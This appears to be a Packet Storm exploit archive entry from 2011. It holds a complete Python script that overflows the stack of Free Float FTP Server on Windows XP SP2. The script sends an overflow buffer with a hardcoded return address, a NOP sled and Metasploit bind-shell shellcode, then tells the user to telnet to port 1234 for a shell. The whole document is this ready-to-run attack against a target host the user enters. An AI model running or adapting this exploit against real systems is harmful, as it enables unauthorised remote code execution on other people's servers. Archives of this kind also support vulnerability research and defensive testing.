Free Float FTP Server Buffer Overflow

2011-08-20T00:00:00
ID PACKETSTORM:104270
Type packetstorm
Reporter Debasish Mandal
Modified 2011-08-20T00:00:00

Description

                                        
                                            `#!/usr/bin/python  
#Free Float FTP server Response stack Buffer Overflow Exploit  
#Tested on: Windows Xp SP2.  
#Author Debasish Mandal  
#URL:http://www.facebook.com/raza.whitehat  
  
  
import socket,sys  
from struct import pack  
  
buff = "A"* 251   
junk = "A"*5  
nop = "\x90"*20  
eip = pack('<L',0x77F5801C)  
  
#Shell code generated by Metasploit frmaework.  
#Shell Code :: windows/shell/bind_tcp.  
#Local PORT :: 1234.  
#Neglected BAD CHARACTERS are "\x00","\x0a" &\x0d".  
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"  
"\x4b\x83\xc2\x04\x31\x6a\x10\x03\x6a\x10\x04\xfc\x3a\xa7\x41"  
"\xff\xc2\x38\x31\x89\x26\x09\x63\xed\x23\x38\xb3\x65\x61\xb1"  
"\x38\x2b\x92\x42\x4c\xe4\x95\xe3\xfa\xd2\x98\xf4\xcb\xda\x77"  
"\x36\x4a\xa7\x85\x6b\xac\x96\x45\x7e\xad\xdf\xb8\x71\xff\x88"  
"\xb7\x20\xef\xbd\x8a\xf8\x0e\x12\x81\x41\x68\x17\x56\x35\xc2"  
"\x16\x87\xe6\x59\x50\x3f\x8c\x05\x41\x3e\x41\x56\xbd\x09\xee"  
"\xac\x35\x88\x26\xfd\xb6\xba\x06\x51\x89\x72\x8b\xa8\xcd\xb5"  
"\x74\xdf\x25\xc6\x09\xe7\xfd\xb4\xd5\x62\xe0\x1f\x9d\xd4\xc0"  
"\x9e\x72\x82\x83\xad\x3f\xc1\xcc\xb1\xbe\x06\x67\xcd\x4b\xa9"  
"\xa8\x47\x0f\x8d\x6c\x03\xcb\xac\x35\xe9\xba\xd1\x26\x55\x62"  
"\x77\x2c\x74\x77\x01\x6f\x11\xb4\x3f\x90\xe1\xd2\x48\xe3\xd3"  
"\x7d\xe2\x6b\x58\xf5\x2c\x6b\x9f\x2c\x88\xe3\x5e\xcf\xe8\x2a"  
"\xa5\x9b\xb8\x44\x0c\xa4\x53\x95\xb1\x71\xf3\xc5\x1d\x2a\xb3"  
"\xb5\xdd\x9a\x5b\xdc\xd1\xc5\x7b\xdf\x3b\x6e\x4a\xfb\x97\xf9"  
"\xae\xfb\x13\x28\x27\x1d\x71\xdc\x61\xb5\xee\x1e\x56\x0e\x88"  
"\x61\xbd\x22\x01\xf6\x8a\x2c\x95\xf9\x0b\x7b\xb5\x56\xa4\xec"  
"\x4e\xb5\x71\x0c\x51\x90\xd2\x59\xc6\x6e\xb2\x28\x76\x6e\x9f"  
"\xd9\x78\xfa\x1b\x48\x2e\x92\x21\xad\x18\x3d\xda\x98\x12\xf4"  
"\x4e\x63\x4d\xf9\x9e\x63\x8d\xaf\xf4\x63\xe5\x17\xac\x37\x10"  
"\x58\x79\x24\x89\xcd\x81\x1d\x7d\x45\xe9\xa3\x58\xa1\xb6\x5c"  
"\x8f\x33\x8b\x8a\xf6\xb1\xfd\xb8\x1a\x7a")  
  
buff += eip  
buff += nop  
buff += shellcode  
buff += junk  
HOST = raw_input("Enter the target host : ")  
PORT = raw_input("Enter the targer port (Default 21): ")  
print "[*] Connecting to the host "+HOST+" on port "+PORT   
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
try:  
connect=s.connect((HOST, int(PORT)))  
print "[*]Connected to target FTP Server!"  
except:  
print "[*] FTP Server didn't respond\n"  
sys.exit(0)  
data=s.recv(1024)  
print "[*]Sending PAYLOAD to the target server"  
s.send(buff+'\r\n')  
print "[*]Exploit Completed..."  
print "[*]Now telnet to the server on port 1234"  
`